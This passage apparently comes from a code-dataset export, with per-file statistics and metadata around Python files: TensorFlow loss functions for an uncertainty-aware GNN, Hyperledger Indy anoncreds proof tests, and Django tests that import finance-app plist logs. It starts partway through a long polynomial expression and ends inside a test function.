- 7.60837356065786e+15*l2**2*l3**11 + 5870658611619.66*l2**2*l3**10 + 5317062429303.04*l2**2*l3**9 - 0.00541666666666667*l2**2*l3**8 + 0.0270833333333333*l2**2*l3**7 + 138035375.397169*l2**2*l3**6 + 165642450.476572*l2**2*l3**5 - 727920.924946151*l2**2*l3**4 - 2292950.91358031*l2**2*l3**3 - 14330.9432098765*l2**2*l3**2 + 12897.8488888889*l2**2*l3 + 151.146666666667*l2**2 - 1.0600483929119e+29*l2*l3**27 - 6.58744358452394e+28*l2*l3**26 + 4.48257203669889e+27*l2*l3**25 + 2.81691550679425e+27*l2*l3**24 - 1.06174926213834e+26*l2*l3**23 - 6.56030601960472e+25*l2*l3**22 + 1.91180550502586e+24*l2*l3**21 + 1.10350170466454e+24*l2*l3**20 - 2.37939664666022e+22*l2*l3**19 - 1.24604181975251e+22*l2*l3**18 + 2.25842237192906e+20*l2*l3**17 + 1.06246824616996e+20*l2*l3**16 - 1.43117477482551e+18*l2*l3**15 - 5.92912381793402e+17*l2*l3**14 + 4.62003345100304e+15*l2*l3**13 + 1.56761545833907e+15*l2*l3**12 - 3877866238868.07*l2*l3**11 - 1678100449795.27*l2*l3**10 - 10174349572.0263*l2*l3**9 - 0.00270833333333333*l2*l3**8 - 92023583.5981465*l2*l3**7 - 69017687.6985845*l2*l3**6 + 1455841.84989223*l2*l3**5 + 1310257.66490298*l2*l3**4 - 9553.96213991775*l2*l3**3 - 12897.8488888889*l2*l3**2 + 2.95585778076202e-14*l2*l3 + 45.344*l2 + 5.04784949005666e+27*l3**28 + 3.028709694034e+27*l3**27 - 1.9218165818031e+26*l3**26 - 1.14891744514372e+26*l3**25 + 4.09875000487826e+24*l3**24 + 2.16805902283681e+24*l3**23 - 9.9520265228209e+22*l3**22 - 3.56564749885582e+22*l3**21 + 1.83431186728448e+21*l3**20 + 4.09510107547028e+20*l3**19 - 2.87004615188914e+19*l3**18 - 5.09702423598348e+18*l3**17 + 2.94345079852047e+17*l3**16 + 4.57412196448806e+16*l3**15 - 1.71471144347053e+15*l3**14 - 215054014135696.0*l3**13 + 6091225077586.03*l3**12 + 930226246585.369*l3**11 - 10174349572.0276*l3**10 - 2289228653.70536*l3**9 + 23005895.8995303*l3**8 + 13803537.5397159*l3**7 - 485280.616630742*l3**6 - 327564.416225742*l3**5 + 4776.98106995889*l3**4 + 4299.28296296296*l3**3 - 22.672*l3 - 0.21255
| 29,126.5
| 174,620
| 0.678317
| 36,256
| 174,759
| 3.26939
| 0.127289
| 0.011111
| 0.014806
| 0.001417
| 0.292859
| 0.130038
| 0.002818
| 0
| 0
| 0
| 0
| 0.616578
| 0.051568
| 174,759
| 6
| 174,620
| 29,126.5
| 0.098578
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.2
| false
| 0
| 0.2
| 0
| 0.6
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 6
|
7db4353f50f871971e957924fdf428480f9cf91e
| 36
|
py
|
Python
|
smart_flies/__init__.py
|
AdamSpannbauer/py_smart_flies
|
40b91651779c441be45f8a92841409f32acf1442
|
[
"MIT"
] | null | null | null |
smart_flies/__init__.py
|
AdamSpannbauer/py_smart_flies
|
40b91651779c441be45f8a92841409f32acf1442
|
[
"MIT"
] | null | null | null |
smart_flies/__init__.py
|
AdamSpannbauer/py_smart_flies
|
40b91651779c441be45f8a92841409f32acf1442
|
[
"MIT"
] | null | null | null |
from .smart_flies import SmartFlies
| 18
| 35
| 0.861111
| 5
| 36
| 6
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.111111
| 36
| 1
| 36
| 36
| 0.9375
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
7db906dd3b0248ca00d636cfc0f01c4c415e3cd6
| 283
|
py
|
Python
|
roomai/common/__init__.py
|
yooyoo2004/RoomAI
|
7f4d655581a03ded801f6c6d7d18f9fff47aa6f5
|
[
"MIT"
] | null | null | null |
roomai/common/__init__.py
|
yooyoo2004/RoomAI
|
7f4d655581a03ded801f6c6d7d18f9fff47aa6f5
|
[
"MIT"
] | null | null | null |
roomai/common/__init__.py
|
yooyoo2004/RoomAI
|
7f4d655581a03ded801f6c6d7d18f9fff47aa6f5
|
[
"MIT"
] | 1
|
2021-08-15T16:19:01.000Z
|
2021-08-15T16:19:01.000Z
|
#!/bin/python
from common import AbstractPlayer
from common import AbstractEnv
from common import AbstractPublicState
from common import AbsractPersonState
from common import AbstractPrivateState
from common import AbstractAction
from common import PokerCard
from common import Info
| 28.3
| 39
| 0.869258
| 34
| 283
| 7.235294
| 0.382353
| 0.325203
| 0.520325
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.116608
| 283
| 9
| 40
| 31.444444
| 0.984
| 0.042403
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
8148d1678f231380cff15f6092f27979a7c3d40b
| 24
|
py
|
Python
|
wxparams/__init__.py
|
Yoshiki443/weather_parameters
|
ae2c9ed02f68968cb6ea0610d556f3c68bbc923e
|
[
"MIT"
] | 17
|
2020-04-26T20:25:56.000Z
|
2022-03-10T09:41:54.000Z
|
wxparams/__init__.py
|
Yoshiki443/weather_parameters
|
ae2c9ed02f68968cb6ea0610d556f3c68bbc923e
|
[
"MIT"
] | null | null | null |
wxparams/__init__.py
|
Yoshiki443/weather_parameters
|
ae2c9ed02f68968cb6ea0610d556f3c68bbc923e
|
[
"MIT"
] | 1
|
2020-06-08T04:54:30.000Z
|
2020-06-08T04:54:30.000Z
|
from .wxparams import *
| 12
| 23
| 0.75
| 3
| 24
| 6
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.166667
| 24
| 1
| 24
| 24
| 0.9
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
8149d602509089a5e93b1791acb98401d56d85f2
| 6,489
|
py
|
Python
|
Uncertainty-GNN/metrics.py
|
YuzhouLin/uncertainty-GNN
|
14f68353ea7b66c17a86497760ef4ceca197304c
|
[
"MIT"
] | 22
|
2020-10-23T01:27:11.000Z
|
2022-03-08T15:37:55.000Z
|
Uncertainty-GNN/metrics.py
|
YuzhouLin/uncertainty-GNN
|
14f68353ea7b66c17a86497760ef4ceca197304c
|
[
"MIT"
] | 1
|
2021-02-08T16:40:57.000Z
|
2021-05-01T16:01:21.000Z
|
Uncertainty-GNN/metrics.py
|
YuzhouLin/uncertainty-GNN
|
14f68353ea7b66c17a86497760ef4ceca197304c
|
[
"MIT"
] | 7
|
2020-10-28T09:36:17.000Z
|
2022-03-05T01:28:37.000Z
|
import tensorflow as tf
import numpy as np
import tensorflow_probability as tfp
tfd = tfp.distributions
def masked_softmax_cross_entropy(preds, labels, mask):
"""Softmax cross-entropy loss with masking."""
loss = tf.nn.softmax_cross_entropy_with_logits(logits=preds, labels=labels)
mask = tf.cast(mask, dtype=tf.float32)
mask /= tf.reduce_mean(mask)
loss *= mask
return tf.reduce_mean(loss)
def masked_cross_entropy(preds, labels, mask):
"""Softmax cross-entropy loss with masking."""
alpha = tf.pow(1.5, preds) + 1.0
# alpha = tf.exp(preds) + 1.0
S = tf.reduce_sum(alpha, axis=1, keepdims=True)
prob = tf.div(alpha, S)
loss = -labels * tf.log(prob)
loss = tf.reduce_sum(loss, axis=1)
# loss = tf.nn.softmax_cross_entropy_with_logits(logits=preds, labels=labels)
mask = tf.cast(mask, dtype=tf.float32)
mask /= tf.reduce_mean(mask)
loss *= mask
return tf.reduce_mean(loss)
def masked_cross_entropy_relu(preds, labels, mask):
"""Softmax cross-entropy loss with masking."""
alpha = preds + 1.0
S = tf.reduce_sum(alpha, axis=1, keepdims=True)
prob = tf.div(alpha, S)
loss = -labels * tf.log(prob)
loss = tf.reduce_sum(loss, axis=1)
# loss = tf.nn.softmax_cross_entropy_with_logits(logits=preds, labels=labels)
mask = tf.cast(mask, dtype=tf.float32)
mask /= tf.reduce_mean(mask)
loss *= mask
return tf.reduce_mean(loss)
def masked_cross_entropy_dirichlet(preds, labels, mask):
"""Softmax cross-entropy loss with masking."""
alpha = tf.exp(preds) + 1.0
S = tf.reduce_sum(alpha, axis=1, keepdims=True)
s_digmma = tf.digamma(S)
loss = labels * (s_digmma - tf.digamma(alpha))
loss = tf.reduce_sum(loss, axis=1)
# loss = tf.nn.softmax_cross_entropy_with_logits(logits=preds, labels=labels)
mask = tf.cast(mask, dtype=tf.float32)
mask /= tf.reduce_mean(mask)
loss *= mask
return tf.reduce_mean(loss)
def masked_square_error_edl(preds, labels, mask):
"""Softmax cross-entropy loss with masking."""
preds = preds + 1.0
S = tf.reduce_sum(preds, axis=1, keepdims=True)
prob = tf.div(preds, S)
loss = tf.square(prob - labels) + prob * (1 - prob) / (S + 1.0)
loss = tf.reduce_sum(loss, axis=1)
mask = tf.cast(mask, dtype=tf.float32)
mask /= tf.reduce_mean(mask)
loss *= mask
return tf.reduce_mean(loss)
def masked_square_error_dirichlet(preds, labels, mask):
"""Softmax cross-entropy loss with masking."""
alpha = tf.exp(preds) + 1.0
# alpha = tf.pow(1.5, preds) + 1.0
S = tf.reduce_sum(alpha, axis=1, keepdims=True)
prob = tf.div(alpha, S)
loss = tf.square(prob - labels) + prob * (1 - prob) / (S + 1.0)
loss = tf.reduce_sum(loss, axis=1)
mask = tf.cast(mask, dtype=tf.float32)
mask /= tf.reduce_mean(mask)
loss *= mask
return tf.reduce_mean(loss)
def masked_DPN(preds, labels, mask):
preds_alpha = tf.exp(preds) + 1.0
Dir_predict = tfd.Dirichlet(preds_alpha)
prior_alpha = labels*50 + 1.1
Dir_ori = tfd.Dirichlet(prior_alpha)
KL_term = Dir_predict.kl_divergence(Dir_ori)
# KL_term = Dir_ori.kl_divergence(Dir_predict)
mask = tf.cast(mask, dtype=tf.float32)
mask /= tf.reduce_mean(mask)
loss = KL_term * mask
return tf.reduce_mean(loss)
def masked_square_error_dirichlet2(preds, labels, mask):
"""Softmax cross-entropy loss with masking."""
alpha = preds + 2.0
# alpha = tf.pow(1.5, preds) + 1.0
S = tf.reduce_sum(alpha, axis=1, keepdims=True)
prob = tf.div(alpha, S)
loss = tf.square(prob - labels) + prob * (1 - prob) / (S + 1.0)
loss = tf.reduce_sum(loss, axis=1)
mask = tf.cast(mask, dtype=tf.float32)
mask /= tf.reduce_mean(mask)
loss *= mask
return tf.reduce_mean(loss)
def masked_kl_edl(preds, label, labels_num, mask):
K = labels_num
alpha = preds * (1.0 - label) + 1.0
beta = tf.constant(np.ones((1, K)), dtype=tf.float32)
S_alpha = tf.reduce_sum(alpha, axis=1, keep_dims=True)
S_beta = tf.reduce_sum(beta, axis=1, keep_dims=True)
lnB = tf.lgamma(S_alpha) - tf.reduce_sum(tf.lgamma(alpha), axis=1, keep_dims=True)
lnB_uni = tf.reduce_sum(tf.lgamma(beta), axis=1, keep_dims=True) - tf.lgamma(S_beta)
dg0 = tf.digamma(S_alpha)
dg1 = tf.digamma(alpha)
kl = tf.reduce_sum((alpha - beta) * (dg1 - dg0), axis=1, keep_dims=True) + lnB + lnB_uni
mask = tf.cast(mask, dtype=tf.float32)
mask /= tf.reduce_mean(mask)
loss = kl * mask
return tf.reduce_mean(loss)
def masked_kl_teacher(preds, gcn_pred):
alpha = tf.exp(preds) + 1.0
S = tf.reduce_sum(alpha, axis=1, keep_dims=True)
prob = tf.div(alpha, S)
kl = prob * (tf.log(tf.div(prob, gcn_pred)))
return tf.reduce_mean(kl)
def masked_kl_prior(preds, prior_alpha, mask):
preds_alpha = tf.exp(preds) + 1.0
Dir_predict = tfd.Dirichlet(preds_alpha)
Dir_ori = tfd.Dirichlet(prior_alpha)
KL_term = Dir_predict.kl_divergence(Dir_ori)
# KL_term = Dir_ori.kl_divergence(Dir_predict)
mask = tf.cast(mask, dtype=tf.float32)
mask /= tf.reduce_mean(mask)
loss = KL_term * mask
return tf.reduce_mean(loss)
def kl_prior(preds, prior_alpha):
preds_alpha = tf.exp(preds) + 1.0
Dir_predict = tfd.Dirichlet(preds_alpha)
Dir_ori = tfd.Dirichlet(prior_alpha)
KL_term = Dir_predict.kl_divergence(Dir_ori)
# KL_term = Dir_ori.kl_divergence(Dir_predict)
loss = KL_term
return tf.reduce_mean(loss)
def masked_accuracy(preds, labels, mask):
"""Accuracy with masking."""
correct_prediction = tf.equal(tf.argmax(preds, 1), tf.argmax(labels, 1))
accuracy_all = tf.cast(correct_prediction, tf.float32)
mask = tf.cast(mask, dtype=tf.float32)
mask /= tf.reduce_mean(mask)
accuracy_all *= mask
return tf.reduce_mean(accuracy_all)
def masked_accuracy_numpy(preds, labels, mask):
"""Accuracy with masking."""
correct_prediction = np.equal(np.argmax(preds, 1), np.argmax(labels, 1))
accuracy_all = np.asarray(correct_prediction, np.float32)
mask = np.asarray(mask, dtype=np.float32)
mask /= np.mean(mask)
accuracy_all *= mask
return np.mean(accuracy_all)
def masked_accuracy_co(correct_prediction, mask):
"""Accuracy with masking."""
accuracy_all = np.array(correct_prediction, np.float32)
mask = np.asarray(mask, dtype=np.float32)
mask /= np.mean(mask)
accuracy_all *= mask
return np.mean(accuracy_all)
| 32.939086
| 92
| 0.670982
| 1,012
| 6,489
| 4.133399
| 0.08498
| 0.080325
| 0.06885
| 0.055941
| 0.84174
| 0.805881
| 0.764045
| 0.745876
| 0.718623
| 0.686828
| 0
| 0.021179
| 0.192325
| 6,489
| 196
| 93
| 33.107143
| 0.776951
| 0.125289
| 0
| 0.635037
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.109489
| false
| 0
| 0.021898
| 0
| 0.240876
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
8199d799e7f3fc1872018dbcde1e72b575d3c07b
| 36
|
py
|
Python
|
django_products/utils/__init__.py
|
sasriawesome/django_products
|
a945dbf983748ff558583695c66226d579bfa4a0
|
[
"MIT"
] | null | null | null |
django_products/utils/__init__.py
|
sasriawesome/django_products
|
a945dbf983748ff558583695c66226d579bfa4a0
|
[
"MIT"
] | 4
|
2021-03-19T01:39:36.000Z
|
2021-06-04T22:49:28.000Z
|
django_products/utils/__init__.py
|
sasriawesome/django_products
|
a945dbf983748ff558583695c66226d579bfa4a0
|
[
"MIT"
] | null | null | null |
from .slugify import unique_slugify
| 18
| 35
| 0.861111
| 5
| 36
| 6
| 0.8
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.111111
| 36
| 1
| 36
| 36
| 0.9375
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
c4bc02fafcb7ba81e4cddeff64e864fed85a8270
| 3,716
|
py
|
Python
|
wrappers/python/tests/anoncreds/test_prover_create_proof.py
|
absltkaos/indy-sdk
|
bc14c5b514dc1c76ce62dd7f6bf804120bf69f5e
|
[
"Apache-2.0"
] | null | null | null |
wrappers/python/tests/anoncreds/test_prover_create_proof.py
|
absltkaos/indy-sdk
|
bc14c5b514dc1c76ce62dd7f6bf804120bf69f5e
|
[
"Apache-2.0"
] | null | null | null |
wrappers/python/tests/anoncreds/test_prover_create_proof.py
|
absltkaos/indy-sdk
|
bc14c5b514dc1c76ce62dd7f6bf804120bf69f5e
|
[
"Apache-2.0"
] | null | null | null |
import json
import pytest
from indy.anoncreds import prover_create_proof
from indy import error
@pytest.mark.asyncio
async def test_prover_create_proof_works(wallet_handle, prepopulated_wallet, gvt_schema_id, gvt_schema,
master_secret_id, proof_req, id_credential_1, issuer_1_gvt_cred_def_id):
credential_def_json, _, _, _, _ = prepopulated_wallet
requested_credentials = {
"self_attested_attributes": {},
"requested_attributes": {
"attr1_referent": {"cred_id": id_credential_1, "revealed": True}
},
"requested_predicates": {
"predicate1_referent": {"cred_id": id_credential_1}
}
}
schemas = {
gvt_schema_id: gvt_schema
}
credential_defs = {
issuer_1_gvt_cred_def_id: json.loads(credential_def_json)
}
await prover_create_proof(wallet_handle, json.dumps(proof_req), json.dumps(requested_credentials),
master_secret_id, json.dumps(schemas), json.dumps(credential_defs), "{}")
@pytest.mark.asyncio
async def test_prover_create_proof_works_for_using_not_satisfy_credential(wallet_handle, prepopulated_wallet,
gvt_schema_id, gvt_schema,
master_secret_id, id_credential_1,
issuer_1_gvt_cred_def_id):
credential_def_json, _, _, _, _ = prepopulated_wallet
proof_req = {
"nonce": "123432421212",
"name": "proof_req_1",
"version": "0.1",
"requested_attributes": {
"attr1_referent": {
"name": "some_attr"
}
},
"requested_predicates": {}
}
requested_credentials = {
"self_attested_attributes": {},
"requested_attributes": {
"attr1_referent": {"cred_id": id_credential_1, "revealed": True}
},
"requested_predicates": {
}
}
schemas = {
gvt_schema_id: gvt_schema
}
credential_defs = {
issuer_1_gvt_cred_def_id: json.loads(credential_def_json)
}
with pytest.raises(error.CommonInvalidStructure):
await prover_create_proof(wallet_handle, json.dumps(proof_req), json.dumps(requested_credentials),
master_secret_id, json.dumps(schemas), json.dumps(credential_defs), "{}")
@pytest.mark.asyncio
async def test_prover_create_proof_works_for_invalid_wallet_handle(wallet_handle, prepopulated_wallet, gvt_schema_id,
gvt_schema, master_secret_id, proof_req,
id_credential_1, issuer_1_gvt_cred_def_id):
credential_def_json, _, _, _, _ = prepopulated_wallet
requested_credentials = {
"self_attested_attributes": {},
"requested_attributes": {
"attr1_referent": {"cred_id": id_credential_1, "revealed": True}
},
"requested_predicates": {
"predicate1_referent": {"cred_id": id_credential_1}
}
}
schemas = {
gvt_schema_id: gvt_schema
}
credential_defs = {
issuer_1_gvt_cred_def_id: json.loads(credential_def_json)
}
invalid_wallet_handle = wallet_handle + 100
with pytest.raises(error.WalletInvalidHandle):
await prover_create_proof(invalid_wallet_handle, json.dumps(proof_req), json.dumps(requested_credentials),
master_secret_id, json.dumps(schemas), json.dumps(credential_defs), "{}")
| 34.728972
| 117
| 0.597686
| 370
| 3,716
| 5.486486
| 0.167568
| 0.053202
| 0.051232
| 0.041379
| 0.836946
| 0.812315
| 0.812315
| 0.812315
| 0.812315
| 0.812315
| 0
| 0.01492
| 0.314586
| 3,716
| 106
| 118
| 35.056604
| 0.782097
| 0
| 0
| 0.493976
| 0
| 0
| 0.120054
| 0.019381
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.048193
| 0
| 0.048193
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
c4c910f754089e4dab392cb97849880e6e66bb37
| 42,621
|
py
|
Python
|
gsb/tests/test_import_plist.py
|
pfrancois/grisbi_django
|
4e27149522847c78ab9c0f0a06f0b1d371f7c205
|
[
"BSD-3-Clause"
] | null | null | null |
gsb/tests/test_import_plist.py
|
pfrancois/grisbi_django
|
4e27149522847c78ab9c0f0a06f0b1d371f7c205
|
[
"BSD-3-Clause"
] | null | null | null |
gsb/tests/test_import_plist.py
|
pfrancois/grisbi_django
|
4e27149522847c78ab9c0f0a06f0b1d371f7c205
|
[
"BSD-3-Clause"
] | null | null | null |
# -*- coding: utf-8 -*
"""
test import
"""
from django.test.utils import override_settings
from django.conf import settings
import os.path
import datetime
import django.utils.timezone as tz
from gsb.io import lecture_plist
from gsb import models
from .test_imports_csv import Test_import_abstract
from gsb.io.lecture_plist import Lecture_plist_exception
from gsb.io.ecriture_plist_money_journal import Export_icompta_plist
import mock
from testfixtures import compare
import collections
class Test_element(Test_import_abstract):
def test_ope(self):
fich = os.path.join(settings.PROJECT_PATH, "gsb", "test_files", "import_plist", 'Applications', 'Money Journal',
'log', "1402954705000.log")
ele = lecture_plist.collection_datas_decodes(fich)
self.compare(ele.datemaj, datetime.datetime(2014, 6, 16, 21, 38, 25, tzinfo=tz.utc))
el = ele.list_el[0]
self.compare(el.device, 'MyHpyVfqnK')
self.compare(el.action, 'c')
self.compare(el.sens_element, 'd')
self.compare(el.is_ope, True)
self.compare(el.is_cat, False)
self.compare(el.is_compte, False)
self.compare(el.is_budget, False)
self.compare(el.lastup, datetime.datetime(2014, 6, 16, 21, 38, 25, tzinfo=tz.utc))
self.compare(el.id, 66)
self.compare(el.cat, 1)
self.compare(el.automatique, False)
self.compare(el.date, datetime.date(2014, 6, 16))
self.compare(el.montant, -10.25)
self.compare(el.tiers, 'Ope standart')
self.compare(el.__str__(), "(66) le 16/06/2014 : -10.25 EUR tiers: Ope standart cpt: 1")
ele = lecture_plist.collection_datas_decodes(
os.path.join(settings.PROJECT_PATH, "gsb", "test_files", "import_plist", 'Applications', 'Money Journal',
'log', "1403036267000.log"))
self.compare(ele.datemaj, datetime.datetime(2014, 6, 17, 20, 17, 47, tzinfo=tz.utc))
el = ele.list_el[0]
self.compare(el.device, 'MyHpyVfqnK')
self.compare(el.action, 'm')
self.compare(el.sens_element, 'd')
self.compare(el.is_ope, True)
self.compare(el.is_cat, False)
self.compare(el.is_compte, False)
self.compare(el.is_budget, False)
self.compare(el.lastup, datetime.datetime(2014, 6, 17, 20, 17, 47, 95470, tzinfo=tz.utc))
self.compare(el.id, 66)
self.compare(el.cat, 1)
self.compare(el.automatique, False)
self.compare(el.date, datetime.date(2014, 6, 16))
self.compare(el.montant, -55)
self.compare(el.tiers, 'Ope standart')
ele = lecture_plist.collection_datas_decodes(
os.path.join(settings.PROJECT_PATH, "gsb", "test_files", "import_plist", 'Applications', 'Money Journal',
'log', "1403037219000.log"))
self.compare(ele.datemaj, datetime.datetime(2014, 6, 17, 20, 33, 39, tzinfo=tz.utc))
el = ele.list_el[0]
self.compare(el.device, 'MyHpyVfqnK')
self.compare(el.action, 'd')
self.compare(el.sens_element, 'd')
self.compare(el.is_ope, True)
self.compare(el.is_cat, False)
self.compare(el.is_compte, False)
self.compare(el.is_budget, False)
self.compare(el.lastup, datetime.datetime(2014, 6, 17, 20, 17, 47, 95470, tzinfo=tz.utc))
self.compare(el.id, 66)
self.compare(el.cat, 1)
self.compare(el.automatique, False)
self.compare(el.date, datetime.date(2014, 6, 16))
self.compare(el.montant, -55)
self.compare(el.tiers, 'Ope standart')
def test_compte(self):
el = lecture_plist.collection_datas_decodes(
os.path.join(settings.PROJECT_PATH, "gsb", "test_files", "import_plist", 'Applications', 'Money Journal',
'log', "1403040634000.log")).list_el[0]
self.compare(el.device, 'MyHpyVfqnK')
self.compare(el.datemaj, datetime.datetime(2014, 6, 17, 21, 30, 34, tzinfo=tz.utc))
self.compare(el.action, 'c')
self.compare(el.is_ope, False)
self.compare(el.is_cat, False)
self.compare(el.is_compte, True)
self.compare(el.is_budget, False)
self.compare(el.lastup, datetime.datetime(2014, 6, 17, 21, 30, 34, tzinfo=tz.utc))
self.compare(el.id, 7)
self.compare(el.couleur, "#000000")
self.compare(el.nom, " ")
el = lecture_plist.collection_datas_decodes(
os.path.join(settings.PROJECT_PATH, "gsb", "test_files", "import_plist", 'Applications', 'Money Journal',
'log', "1403040635000.log")).list_el[0]
self.compare(el.device, 'MyHpyVfqnK')
self.compare(el.datemaj, datetime.datetime(2014, 6, 17, 21, 30, 35, tzinfo=tz.utc))
self.compare(el.action, 'm')
self.compare(el.is_ope, False)
self.compare(el.is_cat, False)
self.compare(el.is_compte, True)
self.compare(el.is_budget, False)
self.compare(el.lastup, datetime.datetime(2014, 6, 17, 21, 30, 34, 88255, tzinfo=tz.utc))
self.compare(el.id, 7)
self.compare(el.couleur, '#000000')
self.compare(el.nom, "Ghh")
self.compare(el.__str__(), "(7) 'Ghh'")
el = lecture_plist.collection_datas_decodes(
os.path.join(settings.PROJECT_PATH, "gsb", "test_files", "import_plist", 'Applications', 'Money Journal',
'log', "1403045414000.log")).list_el[0]
self.compare(el.device, 'MyHpyVfqnK')
self.compare(el.datemaj, datetime.datetime(2014, 6, 17, 22, 50, 14, tzinfo=tz.utc))
self.compare(el.action, 'd')
self.compare(el.is_ope, False)
self.compare(el.is_cat, False)
self.compare(el.is_compte, True)
self.compare(el.is_budget, False)
self.compare(el.lastup, datetime.datetime(2014, 6, 17, 21, 30, 34, 88255, tzinfo=tz.utc))
self.compare(el.id, 7)
self.compare(el.couleur, "#000000")
self.compare(el.nom, "Ghh")
def test_element_cat(self):
el = lecture_plist.collection_datas_decodes(
os.path.join(settings.PROJECT_PATH, "gsb", "test_files", "import_plist", 'Applications', 'Money Journal',
'log', "1403049014000.log")).list_el[0]
self.compare(el.device, 'MyHpyVfqnK')
self.compare(el.datemaj, datetime.datetime(2014, 6, 17, 23, 50, 14, tzinfo=tz.utc))
self.compare(el.action, 'c')
self.compare(el.is_ope, False)
self.compare(el.is_cat, True)
self.compare(el.is_compte, False)
self.compare(el.is_budget, False)
self.compare(el.lastup, datetime.datetime(2014, 6, 17, 23, 50, 14, tzinfo=tz.utc))
self.compare(el.id, 16)
self.compare(el.couleur, '#000000')
self.compare(el.nom, " ")
self.compare(el.type_cat, "d")
el = lecture_plist.collection_datas_decodes(
os.path.join(settings.PROJECT_PATH, "gsb", "test_files", "import_plist", 'Applications', 'Money Journal',
'log', "1403049014010.log")).list_el[0]
self.compare(el.device, 'MyHpyVfqnK')
self.compare(el.datemaj, datetime.datetime(2014, 6, 17, 23, 50, 14, 10000, tzinfo=tz.utc))
self.compare(el.action, 'm')
self.compare(el.is_ope, False)
self.compare(el.is_cat, True)
self.compare(el.is_compte, False)
self.compare(el.is_budget, False)
self.compare(el.lastup, datetime.datetime(2014, 6, 17, 23, 50, 14, 10000, tzinfo=tz.utc))
self.compare(el.id, 16)
self.compare(el.couleur, '#000000')
self.compare(el.nom, "Cat aded")
self.compare(el.type_cat, "d")
self.compare(el.__str__(), "(16) 'Cat aded' type:d")
el = lecture_plist.collection_datas_decodes(
os.path.join(settings.PROJECT_PATH, "gsb", "test_files", "import_plist", 'Applications', 'Money Journal',
'log', "1403049014020.log")).list_el[0]
self.compare(el.device, 'MyHpyVfqnK')
self.compare(el.datemaj, datetime.datetime(2014, 6, 17, 23, 50, 14, 20000, tzinfo=tz.utc))
self.compare(el.action, 'd')
self.compare(el.is_ope, False)
self.compare(el.is_cat, True)
self.compare(el.is_compte, False)
self.compare(el.is_budget, False)
self.compare(el.lastup, datetime.datetime(2014, 6, 17, 23, 50, 14, 10000, tzinfo=tz.utc))
self.compare(el.id, 16)
self.compare(el.couleur, '#000000')
self.compare(el.nom, "Cat aded")
self.compare(el.type_cat, "d")
class Test_check(Test_import_abstract):
@override_settings(DIR_DROPBOX=os.path.join(settings.PROJECT_PATH, "gsb", "test_files", "import_plist"))
def test_element_check(self):
self.compare(lecture_plist.check(), True) # TODO improve it
class Test_import_item_first_part(Test_import_abstract):
def setUp(self):
self.request = self.request_get('outils')
self.lastmaj = datetime.datetime(2014, 6, 15, 00, 25, 14, tzinfo=tz.utc)
@override_settings(DIR_DROPBOX=os.path.join(settings.PROJECT_PATH, "gsb", "test_files", "import_plist"))
def test_element_import(self):
"""normalement il n'y a aucune operation"""
self.lastmaj = datetime.datetime(2014, 6, 20, 00, 25, 14, tzinfo=tz.utc)
self.compare(sorted(lecture_plist.import_items(lastmaj=self.lastmaj, request=self.request).most_common()), [('deja', 9)])
@override_settings(DIR_DROPBOX=os.path.join(settings.PROJECT_PATH, "gsb", "test_files", "import_plist"))
def test_element_import2(self):
"""avec crea, modif et del de chaque type"""
